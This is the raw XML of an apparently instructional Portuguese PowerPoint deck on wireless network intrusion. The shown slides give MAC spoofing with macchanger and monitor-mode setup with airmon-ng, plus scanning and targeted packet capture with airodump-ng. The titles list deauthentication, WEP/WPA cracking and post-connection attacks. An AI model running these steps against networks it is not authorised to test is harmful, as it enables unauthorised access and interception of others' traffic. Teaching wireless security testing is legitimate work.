              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t>capaz de produzir todos os passos de um ataque a redes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>wi-fi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> de 2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>Ghz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> e 5Ghz </a:t>
            </a:r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B307D1C-479C-4449-98F6-1DD5F6781AFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556182" y="2955650"/>
            <a:ext cx="427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Modelo sem marca  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>mais barato, mas de qualidade inferior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D96356D-C0E0-4124-93B5-795B409EC1BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6392945" y="2955649"/>
            <a:ext cx="4270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Alfa AWUS036ACH </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>mais caro, mas de qualidade superior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55904C5-FE35-4B73-A827-DF4B5FF5BC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785" y="3713450"/>
            <a:ext cx="2429229" cy="2429229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Imagem 10" descr="Uma imagem contendo Seta&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DAE785F-B5B2-4F45-A167-EE16066190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767" y="3566723"/>
            <a:ext cx="2926152" cy="292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16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7CD815-5C8E-4DF2-8869-CFFDDFA38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Mudança do MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Address</a:t>
            </a:r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C140A05-219A-4941-8383-72032E48DD27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="961534" y="1979629"/>
            <a:ext cx="76168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Endereço físico da máquina. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t>Referente à segunda camada do modela TCP/IP ou OSI.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91BB091-BE1C-4176-95F7-40E364902B8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2535810" y="3429000"/>
            <a:ext cx="55335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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>AB:12:CD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3200" dirty="0"/>
              <a:t>:34:EF:56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E52DD99-4FBE-4FA8-96CA-71A29AA1A15B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1970203" y="4570594"/>
            <a:ext cx="2479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Assinatura do fabricante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A4FC925-50D9-42FB-BF04-6CA9C19C94EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499728" y="4570594"/>
            <a:ext cx="3242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Endereço único da máquina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Seta: para Cima 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B831CD3-E019-4CA2-A716-750C969E6DE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3129699" y="4107518"/>
            <a:ext cx="301658" cy="4630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: para Cima 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41713373-74CD-497D-AF8E-EB0C3E8A7FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5019773" y="4107518"/>
            <a:ext cx="301658" cy="4630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13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7CD815-5C8E-4DF2-8869-CFFDDFA38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Mudança do MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Address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9CA853B-8DD9-4D9E-A814-EA859D48369E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2102177"/>
            <a:ext cx="6778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ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> wlan0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>down</a:t>
            </a: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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> link set dev wlan0 address 00:00:00:44:11:22</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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Ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> wlan0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>up</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t>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A1CE423-3BB9-4B18-90DA-284C35D58FF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1711766"/>
            <a:ext cx="2941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Mudança manual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3D5BF6D-5DE2-4D9A-95A7-22B73BB0C624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3637184"/>
            <a:ext cx="4987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Mudança automática (e aleatória)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210CBB3-318E-466D-8D78-55E31840380C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741181" y="4119927"/>
            <a:ext cx="8581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ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> wlan0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>down</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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macchanger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> wlan0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ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> wlan0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>up</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t>Em alguns casos pode ser necessário executar o comando abaixo para funcionar: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err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> network-manager </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>restart</a:t>
            </a:r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7843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C4594E-1E1A-47E9-9A63-C04E2F33C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Configuração</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do modo monitor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02B465-6F36-4B91-8675-267E006A8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65796"/>
            <a:ext cx="4572787" cy="917788"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>airmon-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> start wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>airmon-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> stop wlan0mon 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504CDD6C-9D5C-4EF7-8002-6B009ABC4A8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="3874415"/>
            <a:ext cx="4912152" cy="1979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err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> wlan0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>down</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>iwconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> wlan0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> monitor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> wlan0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>up</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> network-manager start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6EC2F2-A398-45A1-8BCE-A050BE7C1364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1572679"/>
            <a:ext cx="2724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Automático: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E817F52-BCB5-4A6B-994D-220E4437DBBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3358692"/>
            <a:ext cx="2724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Manual:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3237852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12571F-7323-4E0F-8DC3-3BC33E5CF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Extração de dados das redes vizinhas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D0267E-10AC-42A7-B613-022136EEC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606490"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> wlan0mon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BC3C288-16BA-419E-AF0F-123E51CC4DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065229" y="2705493"/>
            <a:ext cx="95493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BSSID – MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> do roteador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PWR – Power/Força – distância da rede. Quanto maior o número, mais próximo do adaptador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Beacons – Frames enviados pela própria rede para dar sinal de atividade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Data – Pacotes de informação em tráfego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#/S – Pacotes de informação coletados nos últimos 10 segundos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CH – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> – Canal da rede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MB – Máxima velocidade da rede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ENC – Tipo de encriptação da rede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CIPHER – Tipo de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>cipher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> usado na rede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AUTH – Tipo de autenticação da rede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ESSID – Nome da rede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5187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CCDEC1-2F8C-4EE9-9E03-2959F768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Ataque a uma rede específica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30087F-5939-4D48-AE1A-3899CEF7D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444926" cy="587637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> X --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> AA:BB:CC:11:22:33 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> teste wlan0mon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> teste-01.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> &amp;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> open teste-01.cap </a:t>
            </a:r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813431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56E03BE3544194A9711D8E727977D0B" ma:contentTypeVersion="9" ma:contentTypeDescription="Crie um novo documento." ma:contentTypeScope="" ma:versionID="22ff5d0a66fe176ebb507ab62aa1c3de">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="0de1bb88-64f6-4f17-8933-73fd235044ff" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a8df32aad410ccae5763d30ffd13a2a2" ns2:_="">
    <xsd:import namespace="0de1bb88-64f6-4f17-8933-73fd23504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e1bb88-64f6-4f17-8933-73fd235044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419632-9094-49CB-BB47-CF4E513AB3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1FF09E-CCBA-419D-AC7D-A4805F88CC52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0de1bb88-64f6-4f17-8933-73fd235044f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E1656A7-3D31-4FBC-BCB8-C3AC7958039A}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <TotalTime>12008</TotalTime>
  <Words>1656</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>230</Paragraphs>
  <Slides>32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32</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="38" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Ariel</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>Apresentação do PowerPoint</vt:lpstr>
      <vt:lpstr>Invasão a redes sem fio (wireless)</vt:lpstr>
      <vt:lpstr>Tipos de adaptador de redes</vt:lpstr>
      <vt:lpstr>Tipos de adaptador de redes</vt:lpstr>
      <vt:lpstr>Mudança do MAC Address</vt:lpstr>
      <vt:lpstr>Mudança do MAC Address</vt:lpstr>
      <vt:lpstr>Configuração do modo monitor</vt:lpstr>
      <vt:lpstr>Extração de dados das redes vizinhas</vt:lpstr>
      <vt:lpstr>Ataque a uma rede específica</vt:lpstr>
      <vt:lpstr>Desconectando redes ou usuários</vt:lpstr>
      <vt:lpstr>Invasão a redes com WEP</vt:lpstr>
      <vt:lpstr>Invasão a redes com WEP</vt:lpstr>
      <vt:lpstr>Invasão a redes com WEP</vt:lpstr>
      <vt:lpstr>Invasão a redes com WEP</vt:lpstr>
      <vt:lpstr>Invasão a redes com WPA/WPA2</vt:lpstr>
      <vt:lpstr>Invasão a redes com WPA/WPA2</vt:lpstr>
      <vt:lpstr>Invasão a redes com WPA/WPA2</vt:lpstr>
      <vt:lpstr>Tarefa</vt:lpstr>
      <vt:lpstr>Como proteger a nossa rede</vt:lpstr>
      <vt:lpstr>Ataques de pós-conexão à rede</vt:lpstr>
      <vt:lpstr>Ataques de pós-conexão à rede</vt:lpstr>
      <vt:lpstr>Ataques de pós-conexão à rede</vt:lpstr>
      <vt:lpstr>Ataques de pós-conexão à rede</vt:lpstr>
      <vt:lpstr>Ataques de pós-conexão à rede</vt:lpstr>
      <vt:lpstr>Ataques de pós-conexão à rede</vt:lpstr>
      <vt:lpstr>Ataques de pós-conexão à rede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Exploits And Metasploit</dc:title>
  <dc:creator>shai</dc:creator>
  <cp:lastModifiedBy>Yehda Rosenberg</cp:lastModifiedBy>
  <cp:revision>66</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-26T08:36:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-27T17:06:29Z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0x010100D56E03BE3544194A9711D8E727977D0B</vt:lpwstr>
  </property>
</Properties>
</file>